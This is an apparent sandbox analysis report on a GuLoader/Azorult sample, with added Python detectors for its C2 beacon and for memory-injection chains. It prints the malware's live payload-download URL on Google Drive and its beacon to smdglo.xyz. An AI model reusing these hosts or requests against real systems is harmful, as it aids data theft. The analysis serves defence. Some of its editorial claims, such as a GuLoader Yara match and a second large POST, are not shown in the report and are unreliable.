Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.p
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php:http://www.msn.com/de-ch/Zhttps://contextual.media.net/me
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.phpd=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: X4lLneI8ZK.exe String found in binary or memory: https://www.globalsign.com/repository/0
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlP
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected:
  POST /panel/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: smdglo.xyz
  Content-Length: 107
  Cache-Control: no-cache
  Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 4c 2f fb 3a 2f fb 39 2f fb 3c 2f fb 3d 2f fb 3a 2f fa 49 2f fb 34 2f fb 34 4b ed 3e 3c ed 3e 33 8c 28 39 f9 48 2f fa 49 4b 8c 4b 2f fb 35 2f fb 3b 2f fb 3c 2f fb 3d 4c ed 3e 3b
  Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9L/:/9/</=/:/I/4/4K><>3(9H/IKK/5/;/</=L>;
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected:
  GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: drive.google.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Cache-Control: no-cache
  Host: doc-0g-b4-docs.googleusercontent.com
  Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.251.36.14:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.36.1:443 -> 192.168.2.6:49819 version: TLS 1.2
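The two request families in this section are the observable network behaviour of the chain: GuLoader fetches its payload from Google Drive with an IE11-style User-Agent (the first GET is redirected to the doc-0g-b4-docs.googleusercontent.com URL shown above), and the dropped Azorult posts a 107-byte opaque beacon to /panel/index.php on smdglo.xyz with an IE6-era User-Agent, followed by a second POST of 89809 bytes that is most likely the upload of harvested data. Below is an editorial example, not code from the report or from either malware family, of detection logic that applies those observations to raw HTTP requests. The request lines and header values are the ones printed in this report and the beacon body is the report's Data Raw field; the CRLF framing is reconstructed and the "benign" request is invented for contrast. The Drive rule is deliberately the weak one: a Drive download with an IE11 User-Agent and no Accept header is a hunting lead, not a verdict. The Azorult rule keys on path, User-Agent and an opaque body together, and high_bit_period records a structural property of the captured body worth knowing before attempting to decode it.

```python
import re

# The 107-byte beacon body from the report's "Data Raw" field (first POST to smdglo.xyz).
AZORULT_BODY = bytes.fromhex(
    "4a4fed3e32ed3e3c892839fe492ffb382ffa494ced3e33ed3e3eed3e3bed3e3eed3e33"
    "ed3e3aed3e3ded3f4e892839ff4c2ffb3a2ffb392ffb3c2ffb3d2ffb3a2ffa492ffb342f"
    "fb344bed3e3ced3e338c2839f9482ffa494b8c4b2ffb352ffb3b2ffb3c2ffb3d4ced3e3b"
)

# Constructed samples: request lines and header values are those printed in the report,
# the CRLF framing is reconstructed, and the "benign" request is invented for contrast.
SAMPLES = {
    "guloader_fetch": (
        b"GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1\r\n"
        b"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
        b"Host: drive.google.com\r\n"
        b"Cache-Control: no-cache\r\n"
        b"\r\n"
    ),
    "azorult_beacon": (
        b"POST /panel/index.php HTTP/1.1\r\n"
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\n"
        b"Host: smdglo.xyz\r\n"
        b"Content-Length: 107\r\n"
        b"Cache-Control: no-cache\r\n"
        b"\r\n" + AZORULT_BODY
    ),
    "benign": (
        b"GET /index.html HTTP/1.1\r\n"
        b"Host: www.example.com\r\n"
        b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/93.0 Safari/537.36\r\n"
        b"Accept: text/html\r\n"
        b"\r\n"
    ),
}

LEGACY_IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
IE11_UA_RE = re.compile(r"Trident/7\.0; rv:11\.0\) like Gecko$")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def nonprintable_count(body):
    return sum(1 for b in body if b < 0x20 or b > 0x7E)


def high_bit_period(body):
    """Gap between consecutive high-bit bytes if it is constant, else None.

    A constant gap is consistent with a short repeating-key XOR over ASCII
    plaintext in which exactly one key byte has its high bit set."""
    offsets = [i for i, b in enumerate(body) if b & 0x80]
    if len(offsets) < 3:
        return None
    gaps = {b - a for a, b in zip(offsets, offsets[1:])}
    return gaps.pop() if len(gaps) == 1 else None


def classify(raw):
    """Return the list of detections that fire on one raw request."""
    method, target, h, body = parse_request(raw)
    ua = h.get("user-agent", "")
    hits = []
    # Azorult panel check-in: fixed path, fixed IE6-era UA, short opaque body.
    if (method == "POST" and target.endswith("/panel/index.php")
            and ua == LEGACY_IE6_UA and 0 < len(body) < 512
            and nonprintable_count(body) / len(body) > 0.2):
        hits.append("azorult_c2_beacon")
    # GuLoader payload fetch: Drive export URL, IE11-style UA, no Accept header
    # (a real browser sends one). Weak on its own; treat as a hunting lead.
    if (method == "GET" and h.get("host") == "drive.google.com"
            and target.startswith("/uc?export=download")
            and IE11_UA_RE.search(ua) and "accept" not in h):
        hits.append("guloader_payload_fetch")
    return hits


def scan(samples):
    return {name: classify(raw) for name, raw in samples.items()}
```

On the captured body, nonprintable_count is 35 and high_bit_period returns 3: every third byte (offsets 2, 5, 8, ...) has the high bit set while all the others fall between 0x28 and 0x4F. That periodicity is what a 3-byte repeating XOR key leaves behind, so testing that hypothesis is the first step before trying to recover the plaintext; the key itself is not on this page and is not guessed here.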

System Summary:

Malicious sample detected (through community Yara rule)
Source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Note on attribution: these three hits (repeated below under "Yara signature match") are the only evidence in this report pointing at OlympicDestroyer. The configuration extractor, the behavioural signatures and the remaining Yara hits all attribute the sample to GuLoader delivering Azorult, so treat the match as a likely rule overlap on code in the unpacked process-17 memory, not as a family attribution, until it is confirmed against the rule's own strings.
Uses 32bit PE files
Source: X4lLneI8ZK.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Detected potential crypto function
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00401B77 0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040301D 0_2_0040301D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402E23 0_2_00402E23
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402EA4 0_2_00402EA4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_004030A6 0_2_004030A6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040154E 0_2_0040154E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040135F 0_2_0040135F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402F2B 0_2_00402F2B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040312C 0_2_0040312C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040159B 0_2_0040159B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402D9F 0_2_00402D9F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402FA3 0_2_00402FA3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308A39 0_2_02308A39
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230A6D8 0_2_0230A6D8
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023063AE 0_2_023063AE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300805 0_2_02300805
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023068AF 0_2_023068AF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023010C6 0_2_023010C6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023065E5 0_2_023065E5
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300A18 0_2_02300A18
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230661A 0_2_0230661A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301671 0_2_02301671
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230164B 0_2_0230164B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308EBC 0_2_02308EBC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301682 0_2_02301682
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300A84 0_2_02300A84
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230328E 0_2_0230328E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300AF6 0_2_02300AF6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300AE9 0_2_02300AE9
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302EED 0_2_02302EED
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023036C0 0_2_023036C0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023096CC 0_2_023096CC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023086CF 0_2_023086CF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302333 0_2_02302333
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308F16 0_2_02308F16
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02306300 0_2_02306300
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230A706 0_2_0230A706
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305378 0_2_02305378
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02306B64 0_2_02306B64
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230175D 0_2_0230175D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300B5F 0_2_02300B5F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304787 0_2_02304787
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02306BDD 0_2_02306BDD
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300000 0_2_02300000
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302003 0_2_02302003
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02302C09 0_2_02302C09
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230286C 0_2_0230286C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301050 0_2_02301050
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023058B2 0_2_023058B2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023050A2 0_2_023050A2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023030AB 0_2_023030AB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023014AB 0_2_023014AB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230589A 0_2_0230589A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230948E 0_2_0230948E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023010E7 0_2_023010E7
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023054DA 0_2_023054DA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023044DE 0_2_023044DE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304D35 0_2_02304D35
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230253A 0_2_0230253A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230593D 0_2_0230593D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02303519 0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02309173 0_2_02309173
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230596A 0_2_0230596A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230195E 0_2_0230195E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304147 0_2_02304147
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304981 0_2_02304981
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02309D83 0_2_02309D83
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02301588 0_2_02301588
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023099FF 0_2_023099FF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023045E0 0_2_023045E0
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023009CF 0_2_023009CF
Contains functionality to call native functions
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308A39 NtWriteVirtualMemory,LoadLibraryA, 0_2_02308A39
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02300805 EnumWindows,NtWriteVirtualMemory, 0_2_02300805
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023068AF NtWriteVirtualMemory,LoadLibraryA, 0_2_023068AF
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230A1F4 NtProtectVirtualMemory, 0_2_0230A1F4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023065E5 NtAllocateVirtualMemory, 0_2_023065E5
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230661A NtAllocateVirtualMemory, 0_2_0230661A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308EBC NtWriteVirtualMemory,LoadLibraryA, 0_2_02308EBC
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305AF2 NtWriteVirtualMemory, 0_2_02305AF2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305B18 NtWriteVirtualMemory, 0_2_02305B18
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305378 NtWriteVirtualMemory, 0_2_02305378
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305BB4 NtWriteVirtualMemory, 0_2_02305BB4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02304787 NtWriteVirtualMemory, 0_2_02304787
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305B8E NtWriteVirtualMemory, 0_2_02305B8E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305BDB NtWriteVirtualMemory, 0_2_02305BDB
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305C2F NtWriteVirtualMemory, 0_2_02305C2F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305C7C NtWriteVirtualMemory, 0_2_02305C7C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02305C55 NtWriteVirtualMemory, 0_2_02305C55
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023058B2 NtWriteVirtualMemory, 0_2_023058B2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023050A2 NtWriteVirtualMemory, 0_2_023050A2
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230589A NtWriteVirtualMemory, 0_2_0230589A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230948E NtWriteVirtualMemory, 0_2_0230948E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023054DA NtWriteVirtualMemory, 0_2_023054DA
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023044DE NtWriteVirtualMemory, 0_2_023044DE
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230253A NtWriteVirtualMemory, 0_2_0230253A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230593D NtWriteVirtualMemory, 0_2_0230593D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02303519 NtWriteVirtualMemory,LoadLibraryA, 0_2_02303519
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0230596A NtWriteVirtualMemory, 0_2_0230596A
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_023045E0 NtWriteVirtualMemory, 0_2_023045E0
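The Nt* references above are the building blocks of in-memory code injection: allocate a region, write a payload into it, then flip its protection to executable (or allocate it RWX to begin with). The Python below is an added example, not part of this report or of the sample, that walks a simplified API trace and reports every region that was both written to and ended up executable, whether in the current process (the NtCurrentProcess pseudo-handle -1, i.e. self-injection) or in a remote one. The trace schema (api, handle, base, prot fields) is an assumption about how a sandbox would log these calls, and the sample trace is constructed; its base address 0x02300000 is borrowed from the memory region in which the GuLoader Yara rule matched, the other addresses and the handle value are made up.

```python
# Added example: detect allocate -> write -> make-executable chains in an API trace.
# The trace schema below is an assumed simplification of a sandbox API log.
from typing import Dict, List, Tuple

CURRENT_PROCESS = -1  # NtCurrentProcess() pseudo-handle, i.e. self-injection
# Windows PAGE_* protection constants that carry execute permission
PAGE_EXECUTE_ANY = {0x10, 0x20, 0x40, 0x80}


def injection_chains(trace: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Return (handle, [apis]) for each region that was written to and ended up executable.

    Two orderings are caught: RW allocation -> write -> NtProtectVirtualMemory(+X), and
    RWX allocation -> write. A region that is written but never made executable, or made
    executable but never written, is not reported.
    """
    regions: Dict[Tuple[int, int], Dict] = {}  # (handle, base) -> state
    hits: List[Tuple[int, List[str]]] = []
    for call in trace:
        key = (call.get("handle", CURRENT_PROCESS), call["base"])
        api = call["api"]
        if api == "NtAllocateVirtualMemory":
            regions[key] = {"exec": call["prot"] in PAGE_EXECUTE_ANY,
                            "written": False, "calls": [api]}
            continue
        state = regions.get(key)
        if state is None:
            continue  # write/protect on memory we never saw allocated: out of scope here
        state["calls"].append(api)
        if api == "NtWriteVirtualMemory":
            state["written"] = True
        elif api == "NtProtectVirtualMemory":
            state["exec"] = call["prot"] in PAGE_EXECUTE_ANY
        if state["written"] and state["exec"]:
            hits.append((key[0], list(state["calls"])))
            del regions[key]  # report each region once
    return hits


# Constructed trace (not real sandbox output). Base 0x02300000 mirrors the region in
# which the GuLoader Yara rule matched; the other addresses and the handle are made up.
SAMPLE_TRACE = [
    {"api": "NtAllocateVirtualMemory", "handle": CURRENT_PROCESS, "base": 0x02300000, "prot": 0x04},
    {"api": "NtWriteVirtualMemory",    "handle": CURRENT_PROCESS, "base": 0x02300000},
    {"api": "NtProtectVirtualMemory",  "handle": CURRENT_PROCESS, "base": 0x02300000, "prot": 0x20},
    # benign-looking: a RW buffer that is written and never made executable
    {"api": "NtAllocateVirtualMemory", "handle": CURRENT_PROCESS, "base": 0x02400000, "prot": 0x04},
    {"api": "NtWriteVirtualMemory",    "handle": CURRENT_PROCESS, "base": 0x02400000},
    # remote process: RWX from the start, so the write alone completes the chain
    {"api": "NtAllocateVirtualMemory", "handle": 0x1A8, "base": 0x00400000, "prot": 0x40},
    {"api": "NtWriteVirtualMemory",    "handle": 0x1A8, "base": 0x00400000},
]

if __name__ == "__main__":
    for handle, calls in injection_chains(SAMPLE_TRACE):
        where = "self" if handle == CURRENT_PROCESS else f"handle 0x{handle:x}"
        print(f"{where}: {' -> '.join(calls)}")
```

The function keys on (handle, base) rather than on the API name alone, which is what separates this from a plain "NtWriteVirtualMemory seen" rule: a loader that writes a RW buffer and never makes it executable does not fire, and a region that is only made executable after a write does.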
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Process Stats: CPU usage > 98%
PE file does not import any functions
(The files listed here are API-set forwarder stubs from the Universal CRT redistributable, dropped into the same Temp directory as the Mozilla NSS libraries; such stubs contain only forwarded exports and legitimately have no import table, so this heuristic firing on them is expected and is not evidence of packing.)
Source: api-ms-win-core-string-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.17.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.17.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: X4lLneI8ZK.exe, 00000000.00000000.332931513.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameKuvertbrd.exe vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe Binary or memory string: OriginalFilename vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs X4lLneI8ZK.exe
Source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs X4lLneI8ZK.exe
